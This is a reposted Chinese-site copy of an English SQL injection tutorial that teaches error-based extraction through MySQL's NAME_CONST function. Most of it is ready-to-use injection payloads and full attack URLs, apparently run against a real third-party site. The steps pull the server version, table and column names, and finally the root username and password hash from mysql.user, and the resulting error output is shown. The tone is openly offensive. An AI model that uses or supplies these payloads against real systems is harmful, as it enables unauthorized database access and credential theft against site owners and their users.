来源:自学PHP网 时间:2015-04-17 13:03 作者: 阅读:次
[导读] It#39;s been a while since I#39;ve made an SQL Injection tutorial, so I#39;d thought I should make a new tutorial using the method name_const. There#39;s not many pa......
|
It's been a while since I've made an SQL Injection tutorial, so I'd thought I should make a new tutorial using the method name_const. There's not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
相关信息 NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that. Code:
NAME_CONST(DATA, VALUE)
Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants. SELECT NAME_CONST('TEST', 1) |---------------| | TEST | | | |---------------| | 1 | | | |---------------| http://dev.mysql.com/doc/refman/5.0/en/m...name-const Intro to MySQL Variables Once you've got your vulnerable site, lets try getting some MySQL system variables using NAME_CONST. Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261'
 Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--
VAR = Your MySQL variable. MySQL 5.1.3 Server System Variables Let's try it out on my site.. Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
Error:Duplicate column name '5.0.27-community-nt'  Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, just wouldn't work there. Luckily, they work here so let's get this going again... Data Extraction Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--
We should get a duplicate column 1 error... Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--
Error:Duplicate column name '1  Now let's get the tables out this bitch.. Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Let's see if it works here, if it does, we can go on and finish the job. Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--
Error:Duplicate column name 'com_admanage  Now I'm going to be lazy and use mysql.user as an example, just for the sake of time. Let's get the columns out of the user table.. Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this, and I get the duplicate column name 'Host'. Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--
Error:Duplicate column name 'Host'  Woot, time to finish this bitch off. Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--
So mine looks like this... Code:
http://www.2cto.com /qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--
Error:Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'  And there we have it, thanks for reading. 摘自 http://hi.baidu.com/evilrapper/blog/item/323702a10ff4009446106459.html |
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
